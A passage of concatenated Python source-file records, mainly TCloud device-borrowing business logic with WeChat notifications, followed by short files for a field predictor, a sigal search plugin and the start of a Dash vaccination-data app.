Phone.HOLD_DATE, deadline)\n # phone_current_holder 原持有人\n # phone_new_holder 新持有人\n\n ret, msg = PhoneBusiness.qyweixin_email(phone_new_holder.id, new_holder_msg_text)\n return ret, msg\n\n @classmethod\n def send_return_msg_qywx(cls, current_phone, phone_current_holder, phone_new_holder):\n if phone_new_holder.id == phone_current_holder.id:\n current_app.logger.info('[{}](资产编号:{}) 设备状态未发生状态变化'.format(current_phone.name, current_phone.asset_id))\n return\n\n current_holder_msg_text = \"\"\"[TCloud] {} ({})\n您归还了一台设备:\n设备 : {},\n资产编号 : {},\n变化 : 持有人将 由 {} (微信号: {}) 变为 {} (微信号: {})\n状态 : 等待接收人确认\"\"\".format(phone_current_holder.nickname, phone_current_holder.wx_userid,\n current_phone.name, current_phone.asset_id,\n phone_current_holder.nickname,\n phone_current_holder.wx_userid,\n phone_new_holder.nickname, phone_new_holder.wx_userid)\n\n PhoneBusiness.qyweixin_email(phone_current_holder.id, current_holder_msg_text)\n\n new_holder_msg_text = \"\"\"[TCloud] {} ({})\n您收到别人归还的一台设备:\n设备 : {},\n资产编号 : {},\n原持有人 : {} (微信号: {})\n持有人 : {} (微信号: {})\n状态 : 等待确认\n请到系统中及时确认接收!\"\"\".format(phone_new_holder.nickname, phone_new_holder.wx_userid, current_phone.name,\n current_phone.asset_id,\n phone_current_holder.nickname, phone_current_holder.wx_userid,\n phone_new_holder.nickname, phone_new_holder.wx_userid)\n\n ret, msg = PhoneBusiness.qyweixin_email(phone_new_holder.id, new_holder_msg_text)\n return ret, msg\n\n @classmethod\n def send_return_confirm_msg_qywx(cls, current_phone, phone_current_holder, phone_new_holder):\n if phone_new_holder.id == phone_current_holder.id:\n current_app.logger.info('[{}](资产编号:{}) 设备状态未发生状态变化'.format(current_phone.name, current_phone.asset_id))\n return\n\n current_holder_msg_text = \"\"\"[TCloud] {} ({})\n您成功归还了一台设备:\n设备 : {},\n资产编号 : {},\n变化 : 持有人已 由 {} (微信号: {}) 变为 {} (微信号: {})\n状态 : 接收人已接收\"\"\".format(phone_current_holder.nickname, phone_current_holder.wx_userid,\n current_phone.name, current_phone.asset_id, phone_current_holder.nickname,\n phone_current_holder.wx_userid,\n phone_new_holder.nickname, phone_new_holder.wx_userid)\n\n PhoneBusiness.qyweixin_email(phone_current_holder.id, current_holder_msg_text)\n\n new_holder_msg_text = \"\"\"[TCloud] {} ({})\n您已接收别人归还的一台设备:\n设备 : {},\n资产编号 : {},\n原持有人 : {} (微信号: {})\n持有人 : {} (微信号: {})\n状态 : 您已接收!\"\"\".format(phone_new_holder.nickname, 
phone_new_holder.wx_userid, current_phone.name, current_phone.asset_id,\n phone_current_holder.nickname, phone_current_holder.wx_userid,\n phone_new_holder.nickname, phone_new_holder.wx_userid)\n\n ret, msg = PhoneBusiness.qyweixin_email(phone_new_holder.id, new_holder_msg_text)\n return ret, msg\n\n @classmethod\n def deadline(cls, current_phone):\n # 根据 phone 最后一条记录计算到期时间\n phone_recorder = PhoneRecord.query.filter(PhoneRecord.phone_id == current_phone.id).order_by(\n PhoneRecord.id.desc()).first()\n deadline = phone_recorder.creation_time + timedelta(days=Phone.HOLD_DATE) # 到期时间\n return deadline\n\n @classmethod\n def create(cls, name, asset_id, vendor, device_number, os, cpu, core, ram, rom, resolution, buy_date, region,\n borrow_id, device_source, device_belong, creator_id):\n try:\n t = Phone(\n name=name,\n asset_id=asset_id,\n vendor=vendor,\n device_number=device_number,\n os=os,\n cpu=cpu,\n core=core,\n ram=ram,\n rom=rom,\n resolution=resolution,\n buy_date=buy_date,\n region=region,\n borrow_id=borrow_id or g.userid,\n creator_id=creator_id or g.userid,\n device_source=device_source,\n device_belong=device_belong,\n )\n db.session.add(t)\n db.session.flush()\n PhoneRecordBusiness.create(t, g.userid)\n db.session.commit()\n phone_holder = User.query.get(t.creator_id)\n\n # 发送企业微信\n PhoneBusiness.send_create_msg_qywx(t, phone_holder)\n\n return 0, None\n except Exception as e:\n current_app.logger.error(str(e))\n current_app.logger.error(traceback.format_exc())\n return 102, str(e)\n\n # 发起流转\n @classmethod\n def move_to_user(cls, id, borrow_id):\n try:\n\n t = Phone.query.get(id)\n phone_new_holder = User.query.get(borrow_id)\n phone_current_holder = User.query.get(t.borrow_id)\n\n # 消除对应设备已有的申请借用用户列表, 将老用户 id 放入,等待接收\n PhoneBorrowBusiness.clear_borrow_user_list(id, phone_current_holder.id)\n\n # 将设备的借出标志置为 1,等待接受者确认\n PhoneBorrowBusiness.add_user_to_confirm(id, phone_new_holder.id)\n\n # 发送企业微信\n PhoneBusiness.send_move_msg_qywx(t, phone_current_holder, phone_new_holder)\n\n return 0, None\n\n except Exception as e:\n current_app.logger.error(e)\n current_app.logger.error(traceback.format_exc())\n return 102, str(e)\n\n # 确认流转\n @classmethod\n def move(cls, id, borrow_id):\n try:\n t = Phone.query.get(id)\n\n phone_new_holder = User.query.get(borrow_id)\n\n if not phone_new_holder:\n return 101, '要转移的用户不存在,请检查用户信息'\n\n t.borrow_id = borrow_id\n\n db.session.add(t)\n PhoneRecordBusiness.update(t, g.userid)\n db.session.commit()\n\n return 0, None\n except Exception as e:\n current_app.logger.error(e)\n return 102, str(e)\n\n # 退回设备\n @classmethod\n def return_to_admin(cls, id):\n try:\n # 此处返还给 创建人\n current_phone = Phone.query.get(id)\n\n admin_id = current_phone.creator_id\n\n phone_current_holder = User.query.get(current_phone.borrow_id)\n phone_new_holder = User.query.get(admin_id)\n\n PhoneRecordBusiness.update(current_phone, g.userid)\n\n # 发送企业微信\n PhoneBusiness.send_return_msg_qywx(current_phone, phone_current_holder, phone_new_holder)\n\n # 消除对应设备已有的申请借用用户列表, 将老用户 id 放入,等待接收\n PhoneBorrowBusiness.clear_borrow_user_list(id, phone_current_holder.id)\n\n # 增加 admin 到 确认名单\n PhoneBorrowBusiness.add_user_to_confirm(id, admin_id)\n\n return 0, None\n except Exception as e:\n current_app.logger.error(e)\n current_app.logger.error(traceback.format_exc())\n return 102, str(e)\n\n # 超时 3 天未接收设备,将退回\n @classmethod\n def cancel_move_to(cls, id):\n try:\n # 直接清除 phone borrow 数据\n current_phone = Phone.query.get(id)\n\n phone_borrow = 
PhoneBorrowBusiness.get_borrow_by_phone_id(phone_id=id)\n\n admin_id = current_phone.creator_id\n\n phone_current_holder = User.query.get(phone_borrow.confirm_userid)\n\n phone_new_holder = User.query.get(admin_id)\n\n # 发送企业微信\n cls.send_cancel_move_msg(current_phone, phone_current_holder, phone_new_holder)\n\n ret, msg = PhoneBorrowBusiness.update(phone_borrow.id, phone_borrow.phone_id, 0, '')\n\n return ret, msg\n\n except Exception as e:\n current_app.logger.error(e)\n current_app.logger.error(traceback.format_exc())\n return 102, str(e)\n\n @classmethod\n def update(cls, id, name, asset_id, vendor, device_number, os, cpu, core, ram, rom, resolution, buy_date, region,\n borrow_id, device_source, device_belong, creator_id):\n try:\n t = Phone.query.get(id)\n\n t.name = name\n t.asset_id = asset_id\n t.vendor = vendor\n t.device_number = device_number\n t.os = os\n t.cpu = cpu\n t.core = core\n t.ram = ram\n t.rom = rom\n t.resolution = resolution\n t.buy_date = buy_date\n t.region = region\n t.borrow_id = borrow_id\n t.device_source = device_source\n t.device_belong = device_belong\n t.creator_id = creator_id\n db.session.add(t)\n PhoneRecordBusiness.update(t, g.userid)\n db.session.commit()\n\n return 0, None\n except Exception as e:\n current_app.logger.error(str(e))\n return 102, str(e)\n\n @classmethod\n def delete(cls, id):\n try:\n t = Phone.query.get(id)\n if t is None:\n return 0\n t.status = Phone.DISABLE\n db.session.add(t)\n PhoneRecordBusiness.delete(t, g.userid)\n db.session.commit()\n return 0\n except Exception as e:\n current_app.logger.error(str(e))\n return 105, str(e)\n\n\nclass PhoneRecordBusiness(object):\n\n @classmethod\n @transfer2json(\n '?id|!phone_id|!name|!asset_id|!vendor|!creation_time|!modified_time|!device_number|!os|!cpu|!core|!ram|'\n '!rom|!resolution|!buy_date|!region|!status|!borrow_id|!creator_id|!device_source|!device_belong|!editor_id'\n )\n def query_json_by_id(cls, id):\n return cls._query().filter(\n PhoneRecord.phone_id == id, Phone.status == Phone.ACTIVE).all()\n\n @classmethod\n @transfer2json(\n '?id|!phone_id|!name|!asset_id|!vendor|!creation_time|!modified_time|!device_number|!os|!cpu|!core|!ram|!rom'\n '|!resolution|!buy_date|!region|!status|!borrow_id|!creator_id|!device_source|!device_belong|!editor_id'\n )\n def query_record_json(cls, phone_id):\n ret = cls._query().filter(PhoneRecord.phone_id == phone_id).order_by(PhoneRecord.id).all()\n return ret\n\n @classmethod\n def _query(cls):\n return PhoneRecord.query.add_columns(\n PhoneRecord.id.label('id'),\n PhoneRecord.phone_id.label('phone_id'),\n PhoneRecord.name.label('name'),\n PhoneRecord.asset_id.label('asset_id'),\n PhoneRecord.vendor.label('vendor'),\n func.date_format(PhoneRecord.creation_time, \"%Y-%m-%d %H:%i:%s\").label('creation_time'),\n func.date_format(PhoneRecord.modified_time, \"%Y-%m-%d %H:%i:%s\").label('modified_time'),\n PhoneRecord.device_number.label('device_number'),\n PhoneRecord.os.label('os'),\n PhoneRecord.cpu.label('cpu'),\n PhoneRecord.core.label('core'),\n PhoneRecord.ram.label('ram'),\n PhoneRecord.rom.label('rom'),\n PhoneRecord.resolution.label('resolution'),\n PhoneRecord.buy_date.label('buy_date'),\n PhoneRecord.region.label('region'),\n PhoneRecord.status.label('status'),\n PhoneRecord.borrow_id.label('borrow_id'),\n PhoneRecord.creator_id.label('creator_id'),\n PhoneRecord.device_source.label('device_source'),\n PhoneRecord.device_belong.label('device_belong'),\n PhoneRecord.editor_id.label('editor_id'),\n )\n\n @classmethod\n def create(cls, t, 
editor_id):\n t_record = PhoneRecord(\n phone_id=t.id,\n name=t.name,\n asset_id=t.asset_id,\n vendor=t.vendor,\n device_number=t.device_number,\n os=t.os,\n cpu=t.cpu,\n core=t.core,\n ram=t.ram,\n rom=t.rom,\n resolution=t.resolution,\n buy_date=t.buy_date,\n region=t.region,\n borrow_id=t.borrow_id,\n creator_id=t.creator_id,\n device_source=t.device_source,\n device_belong=t.device_belong,\n editor_id=editor_id,\n )\n db.session.add(t_record)\n\n @classmethod\n def update(cls, t, editor_id):\n t_record = PhoneRecord(\n phone_id=t.id,\n name=t.name,\n asset_id=t.asset_id,\n vendor=t.vendor,\n device_number=t.device_number,\n os=t.os,\n cpu=t.cpu,\n core=t.core,\n ram=t.ram,\n rom=t.rom,\n resolution=t.resolution,\n buy_date=t.buy_date,\n region=t.region,\n borrow_id=t.borrow_id,\n creator_id=t.creator_id,\n device_source=t.device_source,\n device_belong=t.device_belong,\n editor_id=editor_id,\n )\n db.session.add(t_record)\n\n @classmethod\n def delete(cls, t, editor_id):\n t_record = PhoneRecord(\n phone_id=t.id,\n name=t.name,\n asset_id=t.asset_id,\n vendor=t.vendor,\n device_number=t.device_number,\n os=t.os,\n cpu=t.cpu,\n core=t.core,\n ram=t.ram,\n rom=t.rom,\n resolution=t.resolution,\n buy_date=t.buy_date,\n region=t.region,\n borrow_id=t.borrow_id,\n creator_id=t.creator_id,\n device_source=t.device_source,\n device_belong=t.device_belong,\n editor_id=editor_id,\n )\n db.session.add(t_record)\n\n @classmethod\n def query_record_detail(cls, phone_id):\n ret = cls.query_record_json(phone_id)\n if not ret:\n return []\n ret_list = []\n asset_config = Config.query.add_columns(Config.content.label('content')).filter(Config.module == 'asset',\n Config.module_type == 1).first()\n content = json.loads(asset_config.content)\n operation_dict = content['operation_dict']\n # name = operation_dict.get('name')\n # asset_id = operation_dict.get('asset_id')\n # status = operation_dict.get('status')\n # borrow_id = operation_dict.get('borrow_id')\n\n ret_dict = {}\n\n user_creater = User.query.get(int(ret[0]['editor_id']))\n ret_dict['modified_time'] = ret[0]['creation_time']\n ret_dict['operation'] = \"[{}({})] : 增加新的资产 {}\".format(user_creater.nickname, user_creater.wx_userid,\n ret[0]['name'])\n ret_list.append(ret_dict)\n\n current_app.logger.info(ret)\n\n for r in range(1, len(ret)):\n for asset_key, asset_value in ret[r - 1].items():\n if asset_key in operation_dict.keys():\n current_app.logger.info(\n \"修改的字段:\" + str(asset_key) + \", 字段值:\" + str(asset_value) + \"-->\" + str(ret[r][asset_key]))\n user_editor = User.query.get(int(ret[r]['editor_id']))\n ret_dict = None\n if asset_key in ('borrow_id',):\n ret_dict = {'modified_time': ret[r]['modified_time']}\n if asset_value != ret[r][asset_key]:\n user_from = User.query.filter(User.id == int(asset_value)).first()\n user_to = User.query.filter(User.id == int(ret[r][asset_key])).first()\n ret_dict['operation'] = \"[{}({})] : {} 由 {}({}) 变更为 {}({})\".format(user_editor.nickname,\n user_editor.wx_userid,\n operation_dict[\n asset_key],\n user_from.nickname,\n user_from.wx_userid,\n user_to.nickname,\n user_to.wx_userid)\n else:\n # user_from = User.query.filter(User.id == int(asset_value)).first()\n user_to = User.query.filter(User.id == int(ret[r][asset_key])).first()\n ret_dict['operation'] = \"[{}({})] : 续借了设备,{} 为 {}({})\".format(user_editor.nickname,\n user_editor.wx_userid,\n operation_dict[asset_key],\n user_to.nickname,\n user_to.wx_userid)\n\n else:\n if asset_value != ret[r][asset_key]:\n ret_dict = {\n 'modified_time': 
ret[r]['modified_time'],\n 'operation': \"[{}({})] : 修改了{} {} 为 {}\".format(user_editor.nickname,\n user_editor.wx_userid,\n operation_dict[asset_key],\n asset_value,\n ret[r][asset_key])\n }\n if ret_dict is not None:\n ret_list.append(ret_dict)\n ret_list = ret_list[::-1]\n return ret_list\n\n\nclass VirtualAssetBusiness(object):\n @classmethod\n def _query(cls):\n return VirtualAsset.query.add_columns(\n VirtualAsset.id.label('id'),\n VirtualAsset.asset_id.label('asset_id'),\n VirtualAsset.passwd.label('passwd'),\n VirtualAsset.administrator.label('administrator'),\n VirtualAsset.bind_tel.label('bind_tel'),\n VirtualAsset.idcard.label('idcard'),\n VirtualAsset.status.label('status'),\n VirtualAsset.asset_type.label('asset_type'),\n VirtualAsset.operator.label('operator')\n )\n\n @classmethod\n @transfer2json(\n '?id|!asset_id|!passwd|!administrator|!idcard|!bind_tel|!status|!asset_type|!operator'\n )\n def query_json_by_id(cls, id):\n return cls._query().filter(VirtualAsset.id == id,\n VirtualAsset.status != VirtualAsset.DISABLE).all()\n\n @classmethod\n def create(cls, asset_id, passwd, administrator, bind_tel, idcard, asset_type, operator):\n try:\n va = VirtualAsset(\n asset_id=asset_id,\n passwd=passwd,\n administrator=administrator,\n bind_tel=bind_tel,\n idcard=idcard,\n asset_type=asset_type,\n operator=operator,\n )\n db.session.add(va)\n db.session.commit()\n return 0, None\n except Exception as e:\n current_app.logger.error(str(e))\n return 102, str(e)\n\n @classmethod\n def update(cls, id, asset_id, passwd, administrator, bind_tel, idcard, asset_type, operator):\n try:\n va = VirtualAsset.query.get(id)\n va.asset_id = asset_id\n va.passwd = passwd\n va.administrator = administrator\n va.bind_tel = bind_tel\n va.idcard = idcard\n va.asset_type = asset_type\n va.operator = operator\n db.session.add(va)\n db.session.commit()\n return 0, None\n except Exception as e:\n current_app.logger.error(str(e))\n return 102, str(e)\n\n @classmethod\n def delete(cls, id):\n try:\n va = VirtualAsset.query.get(id)\n if va is None:\n return 0\n va.status = VirtualAsset.DISABLE\n db.session.add(va)\n db.session.commit()\n return 0\n except Exception as e:\n current_app.logger.error(str(e))\n return 105, str(e)\n\n @classmethod\n @transfer2json(\n '?id|!asset_id|!passwd|!administrator|!idcard|!bind_tel|!status|!asset_type|!operator',\n ispagination=True\n )\n def paginate_data(cls, page_size, page_index):\n asset_type = request.args.get('type')\n query = cls._query().filter(VirtualAsset.status != VirtualAsset.DISABLE)\n if asset_type:\n query = query.filter(VirtualAsset.asset_type == int(asset_type))\n count = query.count()\n data = query.order_by(desc(VirtualAsset.id)).limit(\n int(page_size)).offset(int(page_index - 1) * int(page_size)).all()\n return data, count\n\n\nclass PhoneBorrowBusiness(object):\n user_trpc = Trpc('auth')\n\n @classmethod\n def _query(cls):\n return PhoneBorrow.query.add_columns(\n PhoneBorrow.id.label('id'),\n PhoneBorrow.phone_id.label('phone_id'),\n PhoneBorrow.user_list.label('user_list'),\n PhoneBorrow.confirm_userid.label('confirm_userid'),\n func.date_format(PhoneBorrow.creation_time, \"%Y-%m-%d %H:%i:%s\").label('creation_time'),\n func.date_format(PhoneBorrow.modified_time, \"%Y-%m-%d %H:%i:%s\").label('modified_time'),\n )\n\n @classmethod\n @transfer2json('?id|!phone_id|!user_list|!confirm_userid|!creation_time|!modified_time')\n def get_borrow_all(cls):\n phone_borrows = cls._query().all()\n return phone_borrows\n\n @classmethod\n def 
get_borrow_by_phone_id(cls, phone_id):\n phone_borrow = cls._query().filter(PhoneBorrow.phone_id == phone_id).first()\n return phone_borrow\n\n @classmethod\n def create(cls, phone_id, confirm_userid=0, user_list=''):\n try:\n phone_borrow = PhoneBorrow(\n phone_id=phone_id,\n user_list=user_list,\n confirm_userid=confirm_userid,\n )\n db.session.add(phone_borrow)\n db.session.commit()\n return 0, None\n except Exception as e:\n current_app.logger.error(str(e))\n return 102, str(e)\n\n @classmethod\n def update(cls, id, phone_id, confirm_userid, user_list):\n try:\n phone_borrow = PhoneBorrow.query.get(id)\n if not phone_borrow:\n cls.create(phone_id, confirm_userid, user_list)\n\n phone_borrow.user_list = user_list\n phone_borrow.confirm_userid = confirm_userid\n db.session.add(phone_borrow)\n db.session.commit()\n return 0, None\n except Exception as e:\n current_app.logger.error(e)\n return 102, str(e)\n\n @classmethod\n def clear_borrow_user_list(cls, phone_id, old_holder_id):\n # 清除 申请用户列表\n # 只剩 原持有者 ID\n try:\n old_holder_id = str(old_holder_id)\n phone_borrow = cls.get_borrow_by_phone_id(phone_id)\n if not phone_borrow:\n ret, msg = cls.create(phone_id, 0, old_holder_id)\n else:\n ret, msg = cls.update(phone_borrow.id, phone_borrow.phone_id, 0, old_holder_id)\n return ret, msg\n except Exception as e:\n current_app.logger.error(e)\n current_app.logger.error(traceback.format_exc())\n return 102, str(e)\n\n @classmethod\n def add_user_to_confirm(cls, phone_id, user_id):\n # 添加 用户ID 到 当前设备的 接收确认列表\n try:\n phone_borrow = cls.get_borrow_by_phone_id(phone_id)\n if not phone_borrow:\n ret, msg = cls.create(phone_id, user_id)\n else:\n ret, msg = cls.update(phone_borrow.id, phone_borrow.phone_id, user_id, phone_borrow.user_list)\n return ret, msg\n except Exception as e:\n current_app.logger.error(e)\n current_app.logger.error(traceback.format_exc())\n return 102, str(e)\n\n @classmethod\n def add_user_to_userlist(cls, phone_id, user_id):\n # 将 申请用户 ID 添加到申请列表\n try:\n phone_borrow = cls.get_borrow_by_phone_id(phone_id)\n if not phone_borrow:\n cls.create(phone_id)\n\n phone_borrow = cls.get_borrow_by_phone_id(phone_id)\n old_user_list = [id for id in phone_borrow.user_list.split(',')]\n user_id = str(user_id)\n if user_id not in old_user_list:\n old_user_list.append(user_id)\n else:\n return 103, \"不能重复借用\"\n new_user_list = ','.join(old_user_list)\n cls.update(phone_borrow.id, phone_id, 0, new_user_list)\n return 0, None\n except Exception as e:\n current_app.logger.error(e)\n current_app.logger.error(traceback.format_exc())\n return 102, str(e)\n\n @classmethod\n @transfer2json(\n '?id|!nickname'\n )\n def get_user_list_by_phone_id(cls, phone_id):\n try:\n phone_borrow = cls.get_borrow_by_phone_id(phone_id)\n if not phone_borrow:\n return []\n user_list = [id for id in phone_borrow.user_list.split(',')]\n users = []\n for user_id in user_list:\n if len(user_id) > 0:\n user = User.query.get(int(user_id))\n if user:\n users.append(user)\n return users\n except Exception as e:\n current_app.logger.error(str(e))\n current_app.logger.error(traceback.format_exc())\n return 102, str(e)\n\n @classmethod\n def send_borrow_msg_qywx(cls, current_phone, phone_holder, current_user):\n\n current_user_nickname = current_user.nickname\n current_user_wx_userid = current_user.wx_userid\n receiver_id = phone_holder.wx_userid\n msg_text = \"\"\"[TCloud] {}({})\n您收到一个设备借用请求:\n借用的设备 : {},\n资产编号 : {},\n借用人 : {} (微信号: {}),\n请通过企业微信沟通,如借出,请通过 TCloud->资产->流转 进行转出。\"\"\".format(phone_holder.nickname, 
phone_holder.wx_userid,\n current_phone.name, current_phone.asset_id, current_user_nickname,\n current_user_wx_userid)\n PhoneBusiness.qyweixin_email(phone_holder.id, msg_text)\n\n @classmethod\n def send_borrow_continue_msg_qywx(cls, current_phone, phone_holder, current_user):\n deadline = PhoneBusiness.deadline(current_phone)\n current_user_nickname = current_user.nickname\n current_user_wx_userid = current_user.wx_userid\n receiver_id = phone_holder.wx_userid\n msg_text = \"\"\"[TCloud] {} ({})\n您续借了一台设备:\n借用的设备 : {},\n资产编号 : {},\n借用人 : {} (微信号: {})\n可持有时间: {} 天\n到期时间: {}\"\"\".format(phone_holder.nickname, phone_holder.wx_userid,\n current_phone.name, current_phone.asset_id, current_user_nickname, current_user_wx_userid,\n Phone.HOLD_DATE, deadline)\n PhoneBusiness.qyweixin_email(phone_holder.id, msg_text)\n\n @classmethod\n def borrow(cls, phone_id):\n # 发起借用\n try:\n ret, msg = 0, None\n current_phone = Phone.query.get(phone_id)\n if current_phone:\n current_user = User.query.get(g.userid)\n phone_holder = User.query.get(current_phone.borrow_id)\n if current_phone.borrow_id == g.userid:\n ret, msg = PhoneBusiness.move(phone_id, phone_holder.id)\n PhoneBorrowBusiness.send_borrow_continue_msg_qywx(current_phone, phone_holder, current_user)\n else:\n ret, msg = PhoneBorrowBusiness.add_user_to_userlist(phone_id, g.userid)\n if ret == 103:\n return ret, msg\n PhoneBorrowBusiness.send_borrow_msg_qywx(current_phone, phone_holder, current_user)\n else:\n return 101, '设备无效'\n return ret, msg\n except Exception as e:\n current_app.logger.error(traceback.format_exc())\n current_app.logger.error(e)\n return 101, e\n\n @classmethod\n def confirm_borrow(cls, phone_id):\n # 确认借用, admin 确认接收\n try:\n current_phone = Phone.query.get(phone_id)\n phone_borrow = cls.get_borrow_by_phone_id(phone_id)\n\n if int(phone_borrow.confirm_userid) != g.userid:\n return 403, '只有接收人可以确认'\n\n phone_current_holder = User.query.get(current_phone.borrow_id)\n phone_new_holder = User.query.get(phone_borrow.confirm_userid)\n\n ret, msg = PhoneBusiness.move(phone_id, int(phone_borrow.confirm_userid))\n\n admins = cls.user_trpc.requests('get', '/user/admin')\n current_app.logger.info('{} 确认接收设备'.format(int(phone_borrow.confirm_userid)))\n if (int(phone_borrow.confirm_userid) in admins or\n int(phone_borrow.confirm_userid) == current_phone.creator_id):\n try:\n PhoneBusiness.send_return_confirm_msg_qywx(current_phone, phone_current_holder, phone_new_holder)\n reason = '成功归还了设备 {}({}) '.format(current_phone.name, current_phone.asset_id)\n current_app.logger.info(reason)\n user_old_id = int(phone_borrow.user_list)\n ret, msg = CreditBusiness.add_sub_score(user_old_id, Credit.CREDIT_ADD_ONCE, reason)\n except Exception as e:\n current_app.logger.error(e)\n else:\n PhoneBusiness.send_move_confirm_msg_qywx(current_phone, phone_current_holder, phone_new_holder)\n ret, msg = cls.update(phone_borrow.id, phone_borrow.phone_id, 0, '')\n\n return ret, msg\n except Exception as e:\n current_app.logger.error(str(e))\n current_app.logger.error(traceback.format_exc())\n return 102, e\n"} {"ext": "py", "sha": "1a2efaf4a3af509ee3dcb5e4b2027c195f95038e", "content": "import ConfigParser\nimport importlib\nfrom pkg_resources import resource_string\nimport StringIO\nfrom landmarkrest.util.util import Util\n\n\nclass FieldPredictor(object):\n\n def __init__(self):\n # TODO: use the configuration file determine if we are using InferLink's field typer, or ISI's\n self.__predictor_impl = 'InferLink'\n\n if self.__predictor_impl == 'InferLink':\n 
self.__section_name = 'Models'\n self.__field_models = self.__load_field_models()\n\n \"\"\"\n End-point function that predicts the type of column that has been extracted (e.g., values extracted\n from multiple pages)\n\n @param preceding_stripes: These are the stripes preceding each of the field values.\n @param field_values: A set of values from multiple pages for the same slot\n @param following_stripes: These are the stripes coming right after the slot values\n @param confidence_threshold: Any column type that is not assigned with at least this level of confidence is\n not returned\n\n @note: The field_values and preceding_stripes should be ordered so they are aligned (e.g., 1st is 1st for both)\n\n @retun: A tuple of (field_name, confidence)\n \"\"\"\n def predict(self, preceding_stripes, slot_values, following_stripes, confidence_threshold=0.0):\n if self.__predictor_impl == 'ISI':\n return {} # TODO: this is where we call ISI's code, however they do it (service, etc.)\n else:\n return self.__inferlink_predict(preceding_stripes, slot_values, following_stripes, confidence_threshold)\n\n def __inferlink_predict(self, preceding_stripes, slot_values, following_stripes, confidence_threshold):\n preds = {}\n for col_type in self.__field_models:\n model = self.__field_models[col_type]\n conf = model.generate_confidence(preceding_stripes, slot_values, following_stripes)\n\n if conf >= confidence_threshold:\n preds[col_type] = conf\n\n top_x = Util.top_x_from_dict(preds, top_x=1)\n argmax = None\n if top_x:\n argmax = top_x[0] # the first one in a one person list\n\n return argmax\n\n def __load_field_models(self):\n self.__field_models = {}\n\n config = ConfigParser.ConfigParser()\n config_buffer = resource_string(__name__, 'config/field_model_configs.cfg')\n buf = StringIO.StringIO(config_buffer)\n config.readfp(buf)\n\n for (attr, value) in config.items(self.__section_name):\n curr_class = importlib.import_module(\"landmarkrest.field_predictor.field_models.%s\" % value)\n instance = getattr(curr_class, value)() # reflection... 
booya!\n self.__field_models[attr] = instance\n\n return self.__field_models"} {"ext": "py", "sha": "1a2efb6deda8d3f8fe78a1c12cc9f64c492364fd", "content": "from blue_ui import app\n\nif __name__ == \"__main__\":\n app.run()"} {"ext": "py", "sha": "1a2efbb64cbd9e877bddc00983df58326fc5f37a", "content": "from example_system.db_connection_wrapper import db_connection_wrapper\n\n\ndef process_data() -> None:\n pass\n\n\ndef process_data_with_error() -> None:\n raise Exception(\"Something went wrong\")\n\n\ndef run_example() -> None:\n with db_connection_wrapper() as db_connection:\n db_connection.execute(\"SELECT * FROM USERS;\")\n db_connection.execute(\"SELECT * FROM CUSTOMERS;\")\n db_connection.execute(\"INSERT ...\")\n process_data()\n\n with db_connection_wrapper() as db_connection:\n db_connection.execute(\"SELECT * FROM USERS;\")\n db_connection.execute(\"SELECT * FROM CUSTOMERS;\")\n db_connection.execute(\"INSERT ...\")\n process_data_with_error()\n\n\nif __name__ == \"__main__\":\n run_example()\n"} {"ext": "py", "sha": "1a2efce8dbbc7ae3c26f3dadb75d2b8ab84a63e0", "content": "\"\"\"\nsde\n==========\nLicense: BSD, see LICENSE for more details.\n\"\"\"\n\n__author__ = \"Danila Vershinin\"\n\nimport logging\n\nfrom .__about__ import (\n __version__,\n)\n\nfrom .sde import main\nfrom .sde import edit_file, read_file\n\n# https://realpython.com/python-logging-source-code/#library-vs-application-logging-what-is-nullhandler\n# when used as library, we default to opt-in approach, whereas library user have to enable logging\n# from lastversion\nlogging.getLogger(__name__).addHandler(logging.NullHandler())\n\n"} {"ext": "py", "sha": "1a2efd8e13205172124ac138799462ec35f7e1be", "content": "from functools import reduce\nfrom jinja2 import Markup\nimport json\nimport logging\nimport os\nimport shutil\n\nfrom sigal import signals\nfrom sigal.utils import url_from_path\nfrom sigal.writer import AbstractWriter\n\nlogger = logging.getLogger(__name__)\n\nASSETS_PATH = os.path.normpath(\n os.path.join(os.path.abspath(os.path.dirname(__file__)), 'static', 'js'))\n\nclass PageWriter(AbstractWriter):\n '''A writer for writing media pages, based on writer'''\n\n template_file = \"search.html\"\n\n def write(self, album):\n ''' Generate the media page and save it '''\n\n from sigal import __url__ as sigal_link\n\n page = self.template.render({\n 'album': album,\n 'index_title': self.index_title,\n 'settings': self.settings,\n 'sigal_link': sigal_link,\n 'theme': {'name': os.path.basename(self.theme),\n 'url': url_from_path(os.path.relpath(self.theme_path,\n album.dst_path))},\n })\n\n output_file = os.path.join(album.dst_path, 'search.html')\n with open(output_file, 'w', encoding='utf-8') as f:\n f.write(page)\n\ndef generate_search(gallery):\n id = 1\n output_file = os.path.join(gallery.albums['.'].dst_path, 'static/js/search-content.js')\n store = {}\n for album in gallery.albums.values():\n album_titles = \" , \".join([*map(lambda x: x[1], album.breadcrumb)])\n for item in album.medias:\n data = {}\n data['title'] = item.title\n if 'author' in item.meta:\n data['author'] = item.meta['author'][0]\n data['url'] = \"/\" + item.path + \"/\" + item.url\n data['thumbnail'] = item.thumbnail\n data['mime'] = item.mime\n if 'slides' in item.meta:\n data['slides'] = item.meta['slides'][0]\n data['album'] = album_titles;\n store[str(id)] = data\n id = id + 1\n\n with open(output_file, 'w', encoding='utf8') as f:\n f.write(\"window.store = \")\n f.write(json.dumps(store))\n\n writer = PageWriter(gallery.settings, 
index_title=\"Search Results\")\n writer.write(gallery.albums['.'])\n\n shutil.copyfile(os.path.join(ASSETS_PATH, 'lunr.js'),\n os.path.join(gallery.albums['.'].dst_path, 'static', 'js', 'lunr.js'))\n\ndef register(settings):\n signals.gallery_build.connect(generate_search)\n"} {"ext": "py", "sha": "1a2efe67762125121390d438c4b5fa8951f4f55d", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 12 11:52:04 2021\n\n@author: Sarah\n\"\"\"\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 7 11:30:49 2021\n\n@author: Sarah\n\"\"\"\nimport pandas as pd\nimport pandasql\nimport dash\nfrom dash.dependencies import Input, Output\nimport dash_core_components as dcc #this had to be changed\n#from dash import dcc\nimport dash_html_components as html #this as well\n#from dash import html\nimport plotly.express as px\nfrom urllib.request import urlopen\nimport json\n\npd.options.mode.chained_assignment = None # default='warn'\n\n# get vaccination data from rki vaccination github repo:\n# (https://github.com/robert-koch-institut/COVID-19-Impfungen_in_Deutschland)\nurl_vacc_data = \"https://raw.githubusercontent.com/robert-koch-institut/COVID-19-Impfungen_in_Deutschland/master/Aktuell_Deutschland_Impfquoten_COVID-19.csv\"\n# read-in data from csv-file (filter out 